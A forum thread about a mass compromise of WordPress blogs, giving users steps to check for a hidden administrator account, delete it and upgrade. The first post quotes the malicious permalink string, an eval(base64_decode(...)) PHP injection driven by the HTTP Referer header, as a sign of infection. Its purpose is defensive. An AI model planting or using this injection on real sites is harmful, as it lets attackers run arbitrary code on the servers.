Wordpress Mass Attack .. update now, it's urgent!

[sOliver]

There has been a mass attack. A lot of wordpress blogs were hacked yesterday.. I think everyone should check their blogs now, because you might not even know that your blog is hacked.

Here's a quick guide how to find out if you have been hacked.

0. Look at your permalinks. If there is a string attached like the one below, you have been hacked:

PHP Code:

/month/year/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. 


1. Go to your Wordpress Admin Site
2. Under "Users" -> "Authors & Users" you will find all users, click on "Administrators".
3. Pay attention closely. If you see another name there (for a second only) you might have been hacked. Verify the number of administrators at the top. Remember the name of the unknown admin. In my case it was something like "EarnestCummingham".

4. Go to your PHPMyAdmin site and open the table "wp_usermeta".
5. Locate "EarnestCummingham" or a user with "wp_user_level" = "10".
6. Delete the user
7. Upgrade your wordpress blog to 2.8.4 (secure)

How to make your blog even more secure?
8. Read the full article at WebmasterWeblog.com

I hope this helps some people.. maybe you have been hacked and don't even know it .. that kinda scares me. A lot of people will not notice this and the hackers will then get what they want .. simply disgusts me

[RebeccaL]

I have quite a number of outdated blogs and none have been hacked. So I dont know if this is an over reaction, or if Im just lucky...

[SteveJohnson]

Quote:

Originally Posted by RebeccaL

I have quite a number of outdated blogs and none have been hacked. So I dont know if this is an over reaction, or if Im just lucky...

You're just lucky. They haven't found you yet. They will.

If you're unwilling or unable to upgrade, be sure to do periodic backups that you can fall back on. Some of the earlier hacks and attacks were so pervasive that it required manually going through each post...

[HeySal]

These attacks have been going on for awhile now. Nothing new - just getting very frequent since January.

[bgmacaw]

Is this one of those many hacks that only work if the WP registration and/or remote posting has been left open?

I did some searching around but I couldn't find any answers to how the hack works. All I could find are panicky blog and forum posts saying upgrade to a version of WordPress that doesn't work right with several plugins I use on my older WP sites.

[qkz283]

Quote:

Originally Posted by bgmacaw

Is this one of those many hacks that only work if the WP registration and/or remote posting has been left open?

I did some searching around but I couldn't find any answers to how the hack works. All I could find are panicky blog and forum posts saying upgrade to a version of WordPress that doesn't work right with several plugins I use on my older WP sites.

Frank,

It appears the only real solution is upgrading. You can read all about the attacks here, including a post by Matt from Wordpress: Techmeme: I don't feel safe with Wordpress, hackers broke in and took things (Robert Scoble/Scobleizer)